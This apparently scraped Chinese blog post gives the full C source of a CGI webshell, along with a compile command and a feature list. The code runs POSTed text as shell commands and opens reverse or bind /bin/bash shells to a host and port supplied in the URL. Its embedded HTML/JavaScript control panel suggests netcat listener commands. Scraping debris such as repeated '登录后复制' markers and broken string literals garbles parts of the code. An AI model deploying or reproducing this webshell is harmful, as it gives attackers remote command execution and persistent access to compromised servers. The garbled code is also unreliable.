c语言实现cgi webshell

#include <stdio.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
  
 
  
struct get_data {
    char key[100];
    char value[100];
};
  
  
void exec_cmd(void){
    printf("Content-type:text/html

");
    FILE *command;
    int size = atoi(getenv("CONTENT_LENGTH"));
    if(size > 1500) {
        printf("Error> Post Data is very big");
        exit(0);
    }
    char *buffer = malloc(size+1);
    fread(buffer,1,size,stdin);
    command = popen(buffer,"r");
    char caracter;
  
    while((caracter = fgetc(command))){
        if(caracter == EOF) break;
        printf("%c",caracter);
    }
  
    pclose(command);
    free(buffer);
    exit(0);
}
  
int error(char *err){
    perror(err);
    exit(EXIT_FAILURE);
}
  
void parser_get(void){
    printf("Content-type:text/html

");
  
    struct get_data *s;
    char *GET = (char *)getenv("QUERY_STRING");
    int i,number_of_get = 0,size_get = strlen(GET);
  
    if(strlen(GET) > 100)
        exit(0);
  
    s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
  
    int element = 0;
    int positionA = 0;
    int positionB = 0;
    int id = 0;
  
    for(i=0;i<size_get;i++){
        if(GET[i] == '='){
            id = 1;
            s[element].key[positionA] = '';
            positionB = 0;
            continue;
        }
  
        if(GET[i] == '&'){
            id = 0;
            s[element].key[positionA] = '';
            s[element].value[positionB] = '';
            positionA = 0;
            positionB = 0;
            element++;
            continue;
        }
  
        if(id==0){
            s[element].key[positionA] = GET[i];
            positionA++;
        }
  
        if(id==1){
            s[element].value[positionB] = GET[i];
            positionB++;
        }
  
        if(i == size_get-1 && GET[size_get-1] != '&'){
            s[element].key[positionA] = '';
            s[element].value[positionB] = '';
            element++;
            continue;
        }
  
  
    }
  
    char *host_x = (char *)malloc(100);
    host_x = NULL;
    char *type_x = (char *)malloc(100);
    type_x = NULL;
    int port_x = 0;
  
    for(i=0;i<element;i++){
        if(strcmp(s[i].key,"type")==0)
            type_x = s[i].value;
        else if(strcmp(s[i].key,"host")==0)
            host_x = s[i].value;
        else if(strcmp(s[i].key,"port")==0)
            port_x = atoi(s[i].value);
    }
  
    free(s);
  
    if(type_x == NULL){
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){
        printf("Something is wrong ... !!!");
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
        printf("You must specify a target host ...");
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if(strcmp(type_x,"reverse") == 0){
        struct sockaddr_in addr;
        int msocket;
        msocket = socket(AF_INET,SOCK_STREAM,0);
  
        if(msocket < 0){
            printf("<font color='red'>Fail to create socket</font>");
            free(host_x);
            free(type_x);
            exit(0);
        }
  
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port_x);
        addr.sin_addr.s_addr = inet_addr(host_x);
  
        memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
  
        if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
            printf("<font color='red'>Fail to connect</font>
");
            free(host_x);
            free(type_x);
            exit(0);
        }
  
        printf("<font color='006600'>Connect with sucess !!!</font>
");
  
        if(fork() == 0){
            close(0); close(1); close(2);
            dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
            execl("/bin/bash","bash","-i", (char *)0);
            close(msocket);
            exit(0);
        }
  
        free(host_x);
        free(type_x);
        exit(0);
    } else if (strcmp(type_x,"bind")==0) {
  
        int my_socket, cli_socket;
        struct sockaddr_in server_addr,cli_addr;
  
        if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
            printf("<font color='red'>Fail to create socket</font>");
            exit(1);
        }
  
        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(port_x);
        server_addr.sin_addr.s_addr = INADDR_ANY;
        bzero(&(server_addr.sin_zero), 8);
  
        int optval = 1;
        setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
  
  
        if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
            printf("<font color='red'>Fail to bind</font>");
            free(host_x);
            free(type_x);
            exit(1);
        }
  
        if (listen(my_socket, 1) < 0){
            printf("<font color='red'>Fail to listen</font>");
            free(host_x);
            free(type_x);
            exit(1);
        } else {
            printf("<font color='006600'>Listen on port %d</font>
",port_x);
        }
  
        if(fork() == 0){
            socklen_t tamanho = sizeof(struct sockaddr_in);
  
            if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
                exit(0);
  
            }
  
            close(0); close(1); close(2);
            dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
  
            execl("/bin/bash","bash","-i",(char *)0);
            close(cli_socket);
  
        }
  
    }
    free(host_x);
    free(type_x);
    exit(0);
}
  
void load_css_js(void){
printf("<style type="text/css">

#page-wrap {

    margin: 20px auto;

    width: 750px;

}



h1 {

    font-family: Impact, Charcoal, sans-serif;

    text-shadow: -1px 0 black, 0 1px black,

     1px 0 black, 0 -1px black;

    color: gray;

    border: #00ff00;

}



body {

    background-color: white;

}



input[type="text"] {

    margin-bottom: 10px;

    border: 1px solid gray;

    color: black;

    box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);

}



hr {

    color: gray;

}



input[type="submit"],input[type="button"] {

    margin-bottom: 10px;

    border: 1px solid gray;

    box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);

}



#bind_reverse {

    display:none;

}



label {

    position: relative;

    clear: left;

    float: left;

    width: 15em;

    margin-right: 5px;

    text-align: right;

    margin-top: 5px;

}





div.scroll {

    border: 1px solid gray;

    margin-bottom: 10px;

    color: black;

    font-family: Tahoma, sans-serif;

    padding: 5px;

    width: 745px;

    height: 295px;

    overflow: auto;

    box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);

}



#cmd_rev {

    position: absolute;

    margin-left: 450px;

    top: 150px;

    width: 250px;

    overflow: auto;

}



#cmd_bin {

    position: absolute;

    margin-left: 450px;

    top: 300px;

    width: 250px;

    overflow: auto;

}



#rev_s {

    display:inline;

}



#bind_s {

    display:inline;

}

</style>



<script type="text/javascript">

function exec_cmd(){

    var Rrequest = new XMLHttpRequest();

    var cmd_x = document.getElementById("xxx");



    var result = document.getElementById("result");



    if(cmd_x.value == '') return;

    if(cmd_x.value == 'clear' || cmd_x.value == 'reset') { result.innerHTML = ''; return; }

    var vv = cmd_x.value;



    vv = vv.replace(/</g,"&#60");

    vv = vv.replace(/>/g,"&#62");



    result.innerHTML += "<pre class="brush:php;toolbar:false;"><b>\$</b> "+vv+"

登录后复制

"; var bodyx = ''; Rrequest.open("POST",window.location.href,true); Rrequest.setRequestHeader("Content-type","text/plain"); Rrequest.send(cmd_x.value); Rrequest.onreadystatechange = function(){ if(Rrequest.status == 200){ if(Rrequest.readyState==4 || Rrequest.readyState=="complete"){ var complete_cont = Rrequest.responseText; complete_cont = complete_cont.replace(/,"<"); complete_cont = complete_cont.replace(/>/g,">"); result.innerHTML += '

'+complete_cont+'

登录后复制

'; result.scrollTop = result.scrollHeight; } } else { if(Rrequest.readyState==4 || Rrequest.readyState=="complete"){ result.innerHTML += "

<b>error !</b>

登录后复制

"; return false; } } } } function load_bind(){ var change_link = document.getElementById("change_link"); var linkz = change_link.innerHTML; if(linkz == 'REVERSE/BIND') { change_link.innerHTML = "COMMAND LINE"; document.getElementById("cmd_line").style.display = 'none'; document.getElementById("bind_reverse").style.display = 'block'; } else { document.getElementById("bind_reverse").style.display = 'none'; document.getElementById("cmd_line").style.display = 'block'; change_link.innerHTML = 'REVERSE/BIND'; } } function update_div(su,xxxd){ var status = document.getElementById(xxxd); if(su.value == 0 || su.value == ""){ status.innerHTML = ""; return false; } if(xxxd == 'cmd_rev') { status.innerHTML = "

nc -v -l "+su.value+"

登录后复制

"; return true; } "); printf(" var server_ip = '%s'; ",getenv("SERVER_ADDR")); printf(" status.innerHTML = "

nc -v "+server_ip+" "+su.value+"

登录后复制

"; return true; } function change_div(ev,field){ if(ev.keyCode == 8 || ev.keyCode == 37 || ev.keyCode == 38 || ev.keyCode == 39 || ev.keycode == 40 || ev.keyCode == 46){ return true; } if(ev.charCode 57){ return false; } if(field.value > 65535){ return false; } return true; } function connect_xxx(div_t){ var get_s = ''; if(div_t == 'rev_s'){ var host_rev = document.getElementById("host_rev"); var port_rev = document.getElementById("port_rev"); if(host_rev.value == '' || port_rev == '' ) return false; get_s = '/?type=reverse&host='+host_rev.value+'&port='+port_rev.value; } else if(div_t == 'bind_s'){ var port_bind = document.getElementById("port_bin"); if(port_bin.value == '') return false; get_s = '/?type=bind&port='+port_bin.value; } var target_div = document.getElementById(div_t); target_div.innerHTML = "Wait ..."; var connect_s = new XMLHttpRequest(); connect_s.open("GET",window.location.href+get_s,true); connect_s.timeout = 3000; connect_s.ontimeout = function(){ target_div.innerHTML = "Listen OK !!!" } connect_s.onreadystatechange = function(){ if(connect_s.status == 200){ if(connect_s.readyState==4 || connect_s.readyState=="complete"){ target_div.innerHTML = connect_s.responseText; } } else { if(connect_s.readyState==4 || connect_s.readyState=="complete"){ result.innerHTML += "error !"; return false; } } } connect_s.send(); } "); } int main(void){ if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd(); if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get(); printf("Content-type:text/html "); printf(" "); printf(" "); printf(" C CGI SHELL =D "); load_css_js(); printf(" "); printf(" "); printf("

C - CGI SHELL

C0d3r: <b>webshell</b> | <a id='change_link' href='javascript:load_bind()'>REVERSE/BIND</a>

登录后复制

<b>Reverse Connection: <div id='rev_s'><font color='red'>Stop</font></div></b>

登录后复制

<label>Host/IP:</label><input type="text" id='host_rev'/>

登录后复制

<label>Port:</label><input type="text" id='port_rev' onkeypress='return change_div(event,this);' onKeyUp='update_div(this,"cmd_rev");' />

登录后复制

<b>Bind Connection: <div id='bind_s'><font color='red'>Stop</font></div></b>

登录后复制

<label>Port To Listen:</label><input type="text" id='port_bin' style="width:50px" onkeypress='return change_div(event,this);' onKeyUp='update_div(this,"cmd_bin");'>

登录后复制

"); return 0; }

编译：
gcc shell.c -o shell.cgi

功能：
1.反弹获得shell（target作为客户端）